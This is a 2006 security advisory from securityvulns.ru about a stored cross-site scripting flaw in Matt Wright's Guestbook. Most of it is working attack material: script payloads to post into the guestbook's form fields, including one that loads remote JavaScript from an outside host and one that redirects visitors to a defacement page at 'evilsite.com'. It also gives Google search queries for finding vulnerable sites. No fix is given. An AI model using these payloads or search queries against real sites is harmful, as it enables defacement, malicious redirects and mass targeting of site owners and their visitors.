Computer Security

Security Advisory: Matt Wright Guestbook Xss Script İnjection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Web+ Shop 5.0 XSS vuln.

  Autonomous LAN party File iNclusion

  Virtual War File İnclusion

  Shadowed Portal Cross Site Scripting

From::) :) <liz0_(at)_bsdmail.com>
Date:09.04.2006
Subject:Matt Wright Guestbook Xss Script İnjection

Matt Wright Guestbook Xss Script İnjection

----------------------------------------------------
site:http://www.scriptarchive.com/
demo:http://www.scriptarchive.com/readme/guestbook.html
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script src=http://liz0.li.funpic.org/hacked.js></script>

<script>location.href="http://evilsite.com/deface.html";</script>

vs..
---------------------------------------------------------
Example Post Message :

Your Name:<script>alert(/Liz0ziM/)</script>
E-Mail:<script>alert(/Liz0ziM/)</script>
URL:blabla
City:blabla , State:blabla Country:blabla
Comments:<script>location.href="http://evilsite.com/deface.html";</script>

----------------------------------------------------------
Credit:Liz0ziM
Mail:liz0@bsdmail.com
Site:www.biyo.tk,www.biyosecurity.be
------------------------------------------------------------
Google:
"Scripts and guestbook created by: Matt Wright "
inurl:guestbook.html
inurl:addguest.html
inurl:"* Back to the Guestbook Entries"
---------------------------------------------------------------
Source:

http://www.blogcu.com/Liz0ziM/431712/
http://liz0zim.no-ip.org/mattguestbook.html

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server